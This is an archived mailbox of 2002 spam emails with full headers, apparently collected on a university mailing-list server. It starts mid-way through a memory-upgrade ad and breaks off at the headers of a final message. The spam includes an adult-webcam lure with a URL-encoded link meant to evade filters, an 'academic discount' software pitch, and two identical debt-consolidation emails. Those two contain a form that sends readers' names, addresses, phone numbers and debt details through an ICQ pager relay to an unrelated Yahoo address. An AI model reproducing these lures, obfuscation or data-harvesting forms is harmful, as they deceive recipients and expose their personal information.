          <TD style="WIDTH: 317px" vAlign=top width=317>
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors"><IMG 
            height=80 alt="Cresendo 7200" hspace=5 
            src="Memory to Go - Specials - October_files/cresone.jpg" width=80 
            align=left border=0 NOSEND="1"></A> <BR></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors">Cresendo/G3 
            400MHz PM6100 To 8100<BR><STRONG>$290</STRONG> </A></FONT></P></TD>
          <TD vAlign=top width="50%">
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors"><IMG 
            height=80 alt="Cresendo L2" hspace=5 
            src="Memory to Go - Specials - October_files/crestwo.jpg" width=80 
            align=left border=0 NOSEND="1"> </A></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors">Cresendo/G3 
            350MHz PM7300 TO 9600<BR><STRONG>$174</STRONG> </A></FONT></P></TD></TR>
        <TR>
          <TD style="WIDTH: 317px" vAlign=top><FONT face="verdana, arial" 
            size=1>Boost your computer's performance up to thirteen times as 
            fast as the original system! The Crescendo 7200 G3 incorporates a G3 
            PowerPC processor and ultra high-speed Level 2 backside cache to 
            achieve truly modern performance levels.</FONT><BR></TD>
          <TD vAlign=top><FONT face="verdana, arial" size=1>Gain G3 
            performance for your "upgrade-challenged" Power Macintosh. The 
            Crescendo utilizes a G4 PowerPC processor that can take advantage of 
            AltiVec-enhanced applications for even more impressive performance 
            gains.</FONT><BR></TD>
        <TR>
          <TD style="WIDTH: 317px" vAlign=top width=317>
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors"><IMG 
            height=80 alt="Cresendo PBG3" hspace=5 
            src="Memory to Go - Specials - October_files/crestre.jpg" width=80 
            align=left border=0 NOSEND="1"> </A></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors">Cresendo/PBG3 
            333MHz PB1400<BR><STRONG>$299</STRONG> </A></FONT></P></TD>
          <TD vAlign=top width="50%">
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors"><IMG 
            height=80 alt=Encore hspace=5 
            src="Memory to Go - Specials - October_files/cresfor.jpg" width=80 
            align=left border=0 NOSEND="1"> </A></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=processors">Encore/ZIF 
            G3 500MHz PMG3<BR><STRONG>$349</STRONG></A></FONT></P></TD></TR>
        <TR>
          <TD style="WIDTH: 317px" vAlign=top><FONT face="verdana, arial" 
            size=1>Boost your computer's performance up to thirteen times as 
            fast as the original system! The Crescendo 7200 G3 incorporates a G3 
            PowerPC processor and ultra high-speed Level 2 backside cache to 
            achieve truly modern performance levels.</FONT><BR></TD>
          <TD vAlign=top><FONT face="verdana, arial" size=1>Gain G3 
            performance for your "upgrade-challenged" Power Macintosh. The 
            Crescendo utilizes a G4 PowerPC processor that can take advantage of 
            AltiVec-enhanced applications for even more impressive performance 
            gains.</FONT><BR></TD>
        <TR>
          <TD style="WIDTH: 317px" vAlign=top width=317>
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=flash.ram"><IMG 
            height=80 alt="Flash Cards" hspace=5 
            src="Memory to Go - Specials - October_files/flash.jpg" width=80 
            align=left border=0 NOSEND="1"></A></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=flash.ram">Flash 
            Cards - <BR>as low as <STRONG>$50!</STRONG> </A></FONT></P></TD>
          <TD vAlign=top width="50%">
            <P><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=rambus"><IMG 
            height=80 alt=Rambus hspace=5 
            src="Memory to Go - Specials - October_files/rambus.jpg" width=80 
            align=left border=0 NOSEND="1"></A></P>
            <P><FONT face="verdana, arial" size=1><A 
            href="http://www.memorytogo.com/?cmd=manu&amp;manu=rambus">Rambus 
            Memory<BR>as low as <STRONG>$36!</STRONG> </A></FONT></P></TD></TR>
        <TR>
          <TD style="WIDTH: 317px" vAlign=top><FONT face="verdana, arial" 
            size=1>Complies with CompactFlashTM specification 1.4. Compatible 
            with PC Card ATA standard. NAND type or AND type flash memory. 
            Minimum 1,000,000 erase cycles. Minimum 10,000 Insertions. Low power 
            consumption and automatic power saving.<BR>
            <HR>
            <STRONG>
            <DIV align=center>Memory to Go</STRONG><BR>(310) 385-7373<BR>Toll 
            Free: (877) 308-9800<BR>Fax: (310) 385-9111 <BR><BR></DIV></FONT>
          <TD vAlign=top><FONT face="verdana, arial" size=1>Cutting-edge 
            technology. Largest bandwith For 820, 840 &amp; 850 Chipset (Pentium 
            4) Lifetime Warranty. Enables data rates of 800 Mbits per second 
            (two bits transferred per each clock cycle, at the leading and the 
            trailing edge of the clock.) Aka: RIMM or RDRAM. </FONT><BR>
            <HR>
            <STRONG></STRONG></B><FONT face="verdana, arial" size=1>Memory to Go 
            respects your right to privacy. This email was sent to you because 
            you are a regular MTG customer. To unsubscribe to this service, <A 
            href="mailto:sales@memorytogo.com"><B>click here</B></A> and enter 
            Unsubscribe as the subject of your 
          email.<STRONG></STRONG></FONT></TD></TD></TD></TR></TBODY></TABLE></STRONG></TD></TR></TBODY></TABLE><BR><BR></FONT></BODY></HTML>

From moore+bounces-blast-funct@cs.utk.edu Tue Mar  5 20:15:15 2002
Return-Path: <moore+bounces-blast-funct@cs.utk.edu>
Received: from cs.utk.edu (LOCALHOST.cs.utk.edu [127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id UAA01621; Tue, 5 Mar 2002 20:15:14 -0500
Received: from cs.utk.edu (160.36.56.56 -> cs.utk.edu)
 by netlib2.cs.utk.edu (smtpshim v1.0); Tue, 5 Mar 2002 20:15:14 -0500
Received: from hotmail.com (marvin@localhost) 
        by cs.utk.edu with SMTP (cf v2.9s-UTK)
	id UAA04546; Tue, 5 Mar 2002 20:12:57 -0500 (EST)
From: <sexi_mandi@hotmail.com>
Received: from hotmail.com (211.114.56.209)
 by cs.utk.edu (smtpshim v1.0); Tue, 5 Mar 2002 20:13:03 -0500
Reply-To: <sexi_mandi@hotmail.com>
Message-ID: <018a26b06c6e$6482d7a5$7bc03eb8@eygquj>
Subject: Best Adult Websites!
Date: Wed, 06 Mar 2002 04:01:16 -0300
MiME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal

Hi, my name is Cindy. I like to flirt and show off with my friends on my webcam. We are all just 18 and currently students. We like to get naked online because its naughty and gives us a thrill. Anyhow I don't want to get in trouble so I am not letting minors in to see us naked. If you want to see, you must click the link below and signup. Its free of charge, we just want to make sure you are 18 before showing you the link to our free webcam. 

Log in from here...   http://www.%61%64%64%69ct%69%76e%73e%78.com

3527mIKj7-004fnIk2271cdJh0-978XTbw160l35


From edu_software2002@excite.com Mon Apr  1 22:59:29 2002
Return-Path: <edu_software2002@excite.com>
Received: from server1.Klormachinery.com (LOCALHOST.cs.utk.edu [127.0.0.1]) 
           by netlib2.cs.utk.edu with ESMTP (cf v2.9t-netlib)
	   id WAA16236; Mon, 1 Apr 2002 22:59:26 -0500
Message-Id: <200204020359.WAA16236@netlib2.cs.utk.edu>
Received: from server1.Klormachinery.com (207.224.124.242)
 by netlib2.cs.utk.edu (smtpshim v1.0); Mon, 1 Apr 2002 22:59:28 -0500
Received: from smtp0126.mail.yahoo.com (wisp-victoryford.dyersville.net [12.29.138.98]) by server1.Klormachinery.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)
	id 2CHHMNSS; Mon, 1 Apr 2002 20:47:51 +0100
Reply-To: edu_discounts2999@excite.com
From: edu_software2002422114@excite.com
To: blaskows@online.emich.edu
Subject: Academic Discount Software 4221141087
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Date: Mon, 1 Apr 2002 23:17:59 -0500

Microsoft Windows XP at 68% OFF, 
Office XP Standard at 70% OFF,
Adobe Photoshop at 54% OFF, 
Adobe Web Collection at 71% OFF
Visual Studio.NET at 82% OFF

Dear Students, Teachers, Faculty, Staff and Schools:

COMPUTER PRODUCTS FOR EDUCATION is pleased to offer to you the best prices on ACADEMIC EDITION SOFTWARE from MICROSOFT, ADOBE, MACROMEDIA and others - AT UP TO 84% OFF RETAIL PRICES.  If you are a Qualified Education Buyer (defined below) you can purchase software products from CPE at HUGE DISCOUNTS during our WINTER SALE!

Qualified Education Buyers include K-12 and HIGHER EDUCATION STUDENTS, TEACHERS, FACULTY, STAFF, and SCHOOLS.

Visit www.edu-software.com or call us 800-679-7007 to order any of the products below.

----------------------           Education           You
ADOBE (Windows & Mac):             Price    Retail   Save!
----------------------           ---------  ------   -----
Acrobat 5.0                        $57.95    $249     77%
After Effects 5.5                 $289.95    $649     55%
GoLive 6.0/LiveMotion 2.0**        $84.95    $399     79%
Illustrator 10.0                   $89.95    $399     77%
InDesign 2.0                      $189.95    $699     73%
PageMaker 7.0                     $279.95    $499     44%
Photoshop 6.0                     $279.95    $609     54%
Premiere 6.0                      $239.95    $549     42%
*******Adobe Collections**********
Design Collection 5.0             $389.95    $999     61%
      (InDesign 2/Photoshop 6/Illustrator 10/Acrobat 5)
Digital Video Collection 6.0      $489.95   $1199     60%
      (Premiere 6/AfterEffects 5.5/Photoshop 6/Illustr 10)
Publishing Collection 11.0        $489.95    $999     51%
      (PageMaker 7/Photoshop 6/Illustrator 10/Acrobat 5)
Web Collection 4.0                $349.95    $999     65%
     (Photoshop 6/Illustrator 10/GoLive 6/LiveMotion 2)   

TO ORDER: www.edu-software.com or call 800-679-7007.


----------------------           Education           You
MACROMEDIA (Windows & Mac):        Price    Retail   Save!
----------------------           ---------  ------   -----
Authorware 6.0 E-Doc              $349.95   $2699     87%
ColdFusion 5/UltraDev 4 Studio    $149.95    $599     75%
Director 8.5 Shockwave Std E-Doc  $349.95   $1199     71%
Dreamweaver 4 Homesite 5           $99.95    $299     67%
Dreamweaver 4 Fireworks 4 Studio  $149.95    $449     67%
Dreamweaver 4 UltraDev 4 Studio   $149.95    $599     75%
eLearning Studio                  $489.95   $2999     84%
     (Authorware/Flash/Dreamweaver)
Fireworks 4                        $99.95    $199     50%
Flash MX                           $99.95    $399     75%
FreeHand 10                        $99.95    $399     75%
UltraDev 4/Fireworks 4 Studio     $194.95    $699     72%
Web Design Studio 4               $194.95    $699     66%
     (Dreamweaver/Fireworks/Flash/Freehand)

TO ORDER: www.edu-software.com or call 800-679-7007.


---------------------------      Education           You
Microsoft:                         Price    Retail   Save!
---------------------------      ---------  ------   -----
Office XP Standard                $148.95    $479     70%
Office XP Professional            $199.95    $579     66%
Office 2001 Macintosh             $209.95    $499     60%
Office Mac v.X for Mac OS X       $215.95    $459     53% 
FrontPage 2002                     $79.95    $169     53%
Publisher 2002                     $79.95    $129     38%
Visio Standard 2002                $69.95    $199     65%
Visio Professional 2002           $159.95    $499     69%
Visual Basic.Net Standard          $59.95    $109     45%
Visual C++.Net Standard            $59.95    $109     45%
Visual C#(sharp).Net Standard      $59.95    $109     45%
Visual Studio.Net Professional     $99.95    $549     82%
Windows XP Professional Upg*      $ 94.95    $299     68%
Windows 2000 Professional Upg*    $129.95    $319     59%

* Windows XP/2000 Pro Upgrade will install on a blank hard drive. 


----------
LICENSING:
----------
For school purchases of five (5) or more units, please call 800-679-7007 for even deeper discounts on license packs.   
----------
For hundreds of other software products available from CPE at similar discounts, visit our website at www.edu-software.com or call us at 800-679-7007. 

Academic Edition software is exactly the same as the Full-Retail version except that it has been deeply discounted for Qualified Education Buyers.  

No verification is required for purchases of Microsoft Office XP Standard.  

For all other products, purchasers must provide fax-verification of status as being a current faculty, staff, or student.  After placing your order, you simply fax to CPE either: (a) a copy of a current picture School I.D. Card or, (b) a current paycheck stub with an alternative picture I.D. (drivers license, etc.).  Schools may purchase by faxing a valid school purchase order.  For more details, visit our web site at www.edu-software.com.

All software sold by CPE is authentic original software from the manufacturer.  THESE ARE NOT PIRATED COPIES.  ALL SOFTWARE COMES IN ORIGINAL MANUFACTURER'S BOXES AND INCLUDES A VALID LICENSE.

CPE is an Authorized Education Reseller for Microsoft, Adobe, Corel, Symantec, Macromedia and many other major software manufacturers. CPE is the only national software distributor committed to providing the lowest prices EXCLUSIVELY to the Education community with the best customer service.

All prices and availability are subject to change without notice.  

___________________

We hope you find this message valuable.  If you do not wish to receive special offers and updates from edu-software.com, please REPLY to this message, and enter the word 'REMOVE' in the subject line.  

E-MAIL MARKETING:  NO WASTED PAPER - SAVES TREES - GOOD FOR THE ENVIRONMENT! DELETE WITH ONE SIMPLE KEYSTROKE! 
___________________

THANK YOU!

MAY GOD BLESS AMERICA!

From pt3y@bellsouth.net Sun Aug 25 23:06:19 2002
Return-Path: <pt3y@bellsouth.net>
Received: from sandybay.ceg.co.za (cequrux.astcape.co.za [196.25.194.144])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g7Q36DZ5002393;
	Sun, 25 Aug 2002 23:06:16 -0400 (EDT)
Received: from sandybay.ceg.co.za (cequrux.astcape.co.za [10.1.1.1]) by sandybay.ceg.co.za
 (Rockliffe SMTPRA 3.4.2) with SMTP id <B0008104788@sandybay.ceg.co.za>;
 Mon, 26 Aug 2002 02:41:31 +0200
Received: from 65.121.80.1 by sandybay.ceg.co.za (InterScan E-Mail VirusWall NT); Mon, 26 Aug 2002 02:46:34 +0200
From: "Curtis Dennis" <pt3y@bellsouth.net>
To: fucavwyu@bellsouth.net
Subject: Got Debt? 
Reply-To: almabueti4396@excite.com
Content-type: text/html; charset=ISO-8859-1
X-Mailer: AOL 6.0 for Windows US sub 10528
Message-ID: <xbioxa.21c6@bellsouth.net>
Date: 2002/08/25 Sun 15:30:10 CDT


<HTML><HEAD><TITLE></TITLE></HEAD><BODY BGCOLOR="WHITE" TEXT="BLACK">
<TABLE WIDTH=600><TR><TD><FONT SIZE=4 FACE="VERDANA" COLOR="#993333">

<CENTER>Got Debt? We can help using Debt Consolidation!</CENTER><BR>

If you owe $4,000 US or more, consolidate your debt
into just 1 payment and let us handle the rest!
Wouldn't it be nice to have to worry about just 1
monthly fee instead of half a dozen? We think so too.<BR><BR>

- No credit checks required<BR>
- You do not have to own a home<BR>
- You do not need another loan<BR>
- Approval within 10 business days<BR>
- Available to all US residents<BR><BR>

For a FREE, no obligation, consultation, please fill
out the form below and return it to us. Paying bills
should not be a chore, and your life should be as easy
and simple as possible. So take advantage of this
great offer!<BR><BR><BR>


<CENTER>-=-=-=-=-=-=-=-=-=-=-<BR><BR>

<FORM Name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post">
<INPUT type="hidden" name="fromemail" value="de6@de.com">
<INPUT type="hidden" name="from" value="de6@de.com">
<INPUT type=hidden name="recipient" value="joeagle1356@yahoo.co.uk">

<TABLE CELLSPACING=2>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Full Name</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{name}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Address</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{address}}"><INPUT Type="text" Size="21" Name="body" Maxlength="35"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>City</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{city}}"><INPUT Name="body" Size="21" Maxlength="30"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>State</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{state}}">
<SELECT Name="body">
<OPTION VALUE=""></OPTION>
<OPTION VALUE="AL"> Alabama
<OPTION VALUE="AK"> Alaska
<OPTION VALUE="AZ"> Arizona
<OPTION VALUE="AR"> Arkansas
<OPTION VALUE="CA"> California
<OPTION VALUE="CO"> Colorado
<OPTION VALUE="CT"> Connecticut
<OPTION VALUE="DE"> Delaware
<OPTION VALUE="DC"> Dist of Columbia
<OPTION VALUE="FL"> Florida
<OPTION VALUE="GA"> Georgia
<OPTION VALUE="HI"> Hawaii
<OPTION VALUE="ID"> Idaho
<OPTION VALUE="IL"> Illinois
<OPTION VALUE="IN"> Indiana
<OPTION VALUE="IA"> Iowa
<OPTION VALUE="KS"> Kansas
<OPTION VALUE="KY"> Kentucky
<OPTION VALUE="LA"> Louisiana
<OPTION VALUE="ME"> Maine
<OPTION VALUE="MD"> Maryland
<OPTION VALUE="MA"> Massachusetts
<OPTION VALUE="MI"> Michigan
<OPTION VALUE="MN"> Minnesota
<OPTION VALUE="MS"> Mississippi
<OPTION VALUE="MO"> Missouri
<OPTION VALUE="MT"> Montana
<OPTION VALUE="NE"> Nebraska
<OPTION VALUE="NV"> Nevada
<OPTION VALUE="NH"> New Hampshire
<OPTION VALUE="NJ"> New Jersey
<OPTION VALUE="NM"> New Mexico
<OPTION VALUE="NY"> New York
<OPTION VALUE="NC"> North Carolina
<OPTION VALUE="ND"> North Dakota
<OPTION VALUE="OH"> Ohio
<OPTION VALUE="OK"> Oklahoma
<OPTION VALUE="OR"> Oregon
<OPTION VALUE="PA"> Pennsylvania
<OPTION VALUE="RI"> Rhode Island
<OPTION VALUE="SC"> South Carolina
<OPTION VALUE="SD"> South Dakota
<OPTION VALUE="TN"> Tennessee
<OPTION VALUE="TX"> Texas
<OPTION VALUE="UT"> Utah
<OPTION VALUE="VT"> Vermont
<OPTION VALUE="VA"> Virginia
<OPTION VALUE="WA"> Washington
<OPTION VALUE="WV"> West Virginia
<OPTION VALUE="WI"> Wisconsin
<OPTION VALUE="WY"> Wyoming
</SELECT>
</TD></TR>

<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Zip Code</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{zipcode}}"><INPUT Name="body" Size="21" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Home Phone</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{hphone}}"><INPUT Type="text" Size="21" Name="body" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Work Phone</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{wphone}}"><INPUT Type="text" Size="21" Name="body" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Time to Contact</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{besttime}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"><INPUT type="hidden" name="to" value="17347873599"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Debt Size</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{debtsize}}">
<SELECT Name="body">
<OPTION VALUE=""></OPTION>
<OPTION VALUE="$4000 - $4999">$4000 - $4999
<OPTION VALUE="$5000 - $7500">$5000 - $7500
<OPTION VALUE="$7,501 - $10,000">$7,501 - $10,000
<OPTION VALUE="$10,001 - $12,500">$10,001 - $12,500
<OPTION VALUE="$12,501 - $15,000">$12,501 - $15,000
<OPTION VALUE="$15,001 - $17,500">$15,001 - $17,500
<OPTION VALUE="$17,501 - $20,000">$17,501 - $20,000
<OPTION VALUE="$20,001 - $22,500">$20,001 - $22,500
<OPTION VALUE="$22,501 - $25,000">$22,501 - $25,000
<OPTION VALUE="$25,001 - $27,500">$25,001 - $27,500
<OPTION VALUE="$27,501 - $30,000">$27,501 - $30,000
<OPTION VALUE="$30,001 - $35,000">$30,001 - $35,000
<OPTION VALUE="$35,001 - $40,000">$35,001 - $40,000
<OPTION VALUE="$45,001 - $50,000">$45,001 - $50,000
<OPTION VALUE="$50,000+">$50,000+
</SELECT>
</TD></TR>

<TR><TD><FONT FACE="VERDANA" SIZE=2><B>E-Mail</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{email}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"></TD></TR>
<TR><TD>&nbsp;</TD><TD><INPUT Type="submit" Value="Submit"></TD></TR>
</TABLE><BR>

</FORM>

-=-=-=-=-=-=-=-=-=-=-</CENTER><BR><BR>


Please note that all fields are required for application to be processed successfully. Thank you for your time<BR><BR>

To be deleted from our mailing list, reply to this email with
the word -Remove- in the subject. We apologize for any
inconveniences.<BR><BR>

</FONT></TD></TR></TABLE>
</BODY></HTML>

pt3y

From 2kihbphayf@lycos.com Tue Sep 10 05:12:02 2002
Return-Path: <2kihbphayf@lycos.com>
Received: from cbi_mail2.cbipc.com ([63.222.143.139])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g8A9C1Z5009738
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 10 Sep 2002 05:12:01 -0400 (EDT)
Received: from veubv.yahoo.co.uk (208.33.111.62 [208.33.111.62]) by cbi_mail2.cbipc.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id SG2FJ35G; Tue, 10 Sep 2002 00:53:32 -0500
From: "Dee Christopher" <2kihbphayf@lycos.com>
To: o97d@lycos.com
Subject: Consolidate Your Bills! 
Reply-To: genovevasaban779@excite.com
Content-type: text/html; charset=ISO-8859-1
X-Mailer: AOL 6.0 for Windows US sub 349
Message-ID: <h8pv4h4.imtasb7@lycos.com>
Date: 2002/09/09 Mon 20:40:03 CDT


<HTML><HEAD><TITLE></TITLE></HEAD><BODY BGCOLOR="WHITE" TEXT="BLACK">
<TABLE WIDTH=600><TR><TD><FONT SIZE=4 FACE="VERDANA" COLOR="#993333">

<CENTER>Got Debt? We can help using Debt Consolidation!</CENTER><BR>

If you owe $4,000 US or more, consolidate your debt
into just 1 payment and let us handle the rest!
Wouldn't it be nice to have to worry about just 1
monthly fee instead of half a dozen? We think so too.<BR><BR>

- No credit checks required<BR>
- You do not have to own a home<BR>
- You do not need another loan<BR>
- Approval within 10 business days<BR>
- Available to all US residents<BR><BR>

For a FREE, no obligation, consultation, please fill
out the form below and return it to us. Paying bills
should not be a chore, and your life should be as easy
and simple as possible. So take advantage of this
great offer!<BR><BR><BR>


<CENTER>-=-=-=-=-=-=-=-=-=-=-<BR><BR>

<FORM Name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post">
<INPUT type="hidden" name="fromemail" value="de6@de.com">
<INPUT type="hidden" name="from" value="de6@de.com">
<INPUT type=hidden name="recipient" value="joeagle1356@yahoo.co.uk">

<TABLE CELLSPACING=2>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Full Name</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{name}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Address</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{address}}"><INPUT Type="text" Size="21" Name="body" Maxlength="35"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>City</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{city}}"><INPUT Name="body" Size="21" Maxlength="30"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>State</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{state}}">
<SELECT Name="body">
<OPTION VALUE=""></OPTION>
<OPTION VALUE="AL"> Alabama
<OPTION VALUE="AK"> Alaska
<OPTION VALUE="AZ"> Arizona
<OPTION VALUE="AR"> Arkansas
<OPTION VALUE="CA"> California
<OPTION VALUE="CO"> Colorado
<OPTION VALUE="CT"> Connecticut
<OPTION VALUE="DE"> Delaware
<OPTION VALUE="DC"> Dist of Columbia
<OPTION VALUE="FL"> Florida
<OPTION VALUE="GA"> Georgia
<OPTION VALUE="HI"> Hawaii
<OPTION VALUE="ID"> Idaho
<OPTION VALUE="IL"> Illinois
<OPTION VALUE="IN"> Indiana
<OPTION VALUE="IA"> Iowa
<OPTION VALUE="KS"> Kansas
<OPTION VALUE="KY"> Kentucky
<OPTION VALUE="LA"> Louisiana
<OPTION VALUE="ME"> Maine
<OPTION VALUE="MD"> Maryland
<OPTION VALUE="MA"> Massachusetts
<OPTION VALUE="MI"> Michigan
<OPTION VALUE="MN"> Minnesota
<OPTION VALUE="MS"> Mississippi
<OPTION VALUE="MO"> Missouri
<OPTION VALUE="MT"> Montana
<OPTION VALUE="NE"> Nebraska
<OPTION VALUE="NV"> Nevada
<OPTION VALUE="NH"> New Hampshire
<OPTION VALUE="NJ"> New Jersey
<OPTION VALUE="NM"> New Mexico
<OPTION VALUE="NY"> New York
<OPTION VALUE="NC"> North Carolina
<OPTION VALUE="ND"> North Dakota
<OPTION VALUE="OH"> Ohio
<OPTION VALUE="OK"> Oklahoma
<OPTION VALUE="OR"> Oregon
<OPTION VALUE="PA"> Pennsylvania
<OPTION VALUE="RI"> Rhode Island
<OPTION VALUE="SC"> South Carolina
<OPTION VALUE="SD"> South Dakota
<OPTION VALUE="TN"> Tennessee
<OPTION VALUE="TX"> Texas
<OPTION VALUE="UT"> Utah
<OPTION VALUE="VT"> Vermont
<OPTION VALUE="VA"> Virginia
<OPTION VALUE="WA"> Washington
<OPTION VALUE="WV"> West Virginia
<OPTION VALUE="WI"> Wisconsin
<OPTION VALUE="WY"> Wyoming
</SELECT>
</TD></TR>

<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Zip Code</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{zipcode}}"><INPUT Name="body" Size="21" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Home Phone</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{hphone}}"><INPUT Type="text" Size="21" Name="body" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Work Phone</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{wphone}}"><INPUT Type="text" Size="21" Name="body" Maxlength="20"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Time to Contact</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{besttime}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"><INPUT type="hidden" name="to" value="60298590120"></TD></TR>
<TR><TD><FONT FACE="VERDANA" SIZE=2><B>Debt Size</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{debtsize}}">
<SELECT Name="body">
<OPTION VALUE=""></OPTION>
<OPTION VALUE="$4000 - $4999">$4000 - $4999
<OPTION VALUE="$5000 - $7500">$5000 - $7500
<OPTION VALUE="$7,501 - $10,000">$7,501 - $10,000
<OPTION VALUE="$10,001 - $12,500">$10,001 - $12,500
<OPTION VALUE="$12,501 - $15,000">$12,501 - $15,000
<OPTION VALUE="$15,001 - $17,500">$15,001 - $17,500
<OPTION VALUE="$17,501 - $20,000">$17,501 - $20,000
<OPTION VALUE="$20,001 - $22,500">$20,001 - $22,500
<OPTION VALUE="$22,501 - $25,000">$22,501 - $25,000
<OPTION VALUE="$25,001 - $27,500">$25,001 - $27,500
<OPTION VALUE="$27,501 - $30,000">$27,501 - $30,000
<OPTION VALUE="$30,001 - $35,000">$30,001 - $35,000
<OPTION VALUE="$35,001 - $40,000">$35,001 - $40,000
<OPTION VALUE="$45,001 - $50,000">$45,001 - $50,000
<OPTION VALUE="$50,000+">$50,000+
</SELECT>
</TD></TR>

<TR><TD><FONT FACE="VERDANA" SIZE=2><B>E-Mail</B></FONT> &nbsp;&nbsp;</TD><TD><INPUT Type="hidden" Name="body" Value="{{email}}"><INPUT Type="text" Size="21" Name="body" Maxlength="30"></TD></TR>
<TR><TD>&nbsp;</TD><TD><INPUT Type="submit" Value="Submit"></TD></TR>
</TABLE><BR>

</FORM>

-=-=-=-=-=-=-=-=-=-=-</CENTER><BR><BR>


Please note that all fields are required for application to be processed successfully. Thank you for your time<BR><BR>

To be deleted from our mailing list, reply to this email with
the word -Remove- in the subject. We apologize for any
inconveniences.<BR><BR>

</FONT></TD></TR></TABLE>
</BODY></HTML>

2kihbphayf

From qzsavv23@mailexcite.com Wed Sep 11 18:58:44 2002
Return-Path: <qzsavv23@mailexcite.com>
Received: from hn315.gov.cn ([210.12.63.72])
	by netlib2.cs.utk.edu (8.12.3/8.12.3) with ESMTP id g8BMwhZ5012514
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 11 Sep 2002 18:58:44 -0400 (EDT)
Received: from [64.40.130.194] (helo=hchqb.worldnet.att.net)
	by hn315.gov.cn with smtp (Exim 3.30 #3)
	id 17pGFc-0007mL-00; Thu, 12 Sep 2002 06:46:24 +0800
From: "Kirk Stan" <qzsavv23@mailexcite.com>
To: ax8510ppomu@mailexcite.com
Subject: Pics for you 
Content-type: text/html; charset=ISO-8859-1
X-Mailer: Lotus Notes Release 5.0.4  June 8, 2000
Message-ID: <494gkkh.5bhw@mailexcite.com>
Date: 2002/09/11 Wed 20:17:44 GMT


